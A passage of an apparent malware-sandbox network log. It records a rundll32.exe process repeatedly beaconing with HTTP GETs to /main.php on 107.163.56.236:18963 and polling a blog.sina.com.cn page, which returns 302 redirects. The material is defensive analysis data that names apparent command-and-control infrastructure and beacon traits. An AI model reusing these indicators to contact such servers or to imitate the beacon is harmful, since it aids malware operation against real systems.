                                                                                                                                    62192.168.2.750081107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:22.781579971 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    63192.168.2.750082116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:22.903887033 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:24.700570107 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:24 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    64192.168.2.750083107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:22.904586077 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    65192.168.2.750087107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:27.023336887 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    66192.168.2.750088107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:27.024148941 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    67192.168.2.750089116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:27.764269114 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    68192.168.2.750090107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:31.050149918 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    69192.168.2.750091116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:31.193454027 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    70192.168.2.750092107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:31.193579912 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    71192.168.2.750093107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:35.169203043 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    72192.168.2.750094107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:35.463093996 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    73192.168.2.750095116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:35.463205099 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:37.253882885 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:36 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    74192.168.2.750097107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:39.313093901 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    75192.168.2.750098107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:39.431165934 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    76192.168.2.750099116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:39.431503057 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    77192.168.2.750100107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:43.560668945 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    78192.168.2.750101116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:43.767142057 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:45.581228971 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:45 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    79192.168.2.750102107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:43.799233913 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    80192.168.2.750105107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:47.689435959 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    81192.168.2.750106107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:47.802362919 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    82192.168.2.750107116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:47.802673101 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:49.600500107 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:49 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    83192.168.2.750109107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:51.703155994 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    84192.168.2.750111107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:51.816128969 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    85192.168.2.750112116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:53.902689934 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    86192.168.2.750113107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:55.716362000 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    87192.168.2.750114107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:55.832550049 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    88192.168.2.750115116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:55.833029985 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:57.543801069 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:57 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    89192.168.2.750117107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:59.738114119 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    90192.168.2.750118107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:59.739207029 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    91192.168.2.750119116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:59.739854097 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:46:01.546864986 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:46:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    92192.168.2.750122107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:03.754858017 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    93192.168.2.750123107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:03.861747026 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    94192.168.2.750124116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:05.787271023 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:46:07.590286016 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:46:07 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    95192.168.2.750127107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:07.765124083 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    96192.168.2.750128107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:07.898623943 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    97192.168.2.750129116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:07.918735981 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:46:09.738346100 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:46:09 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
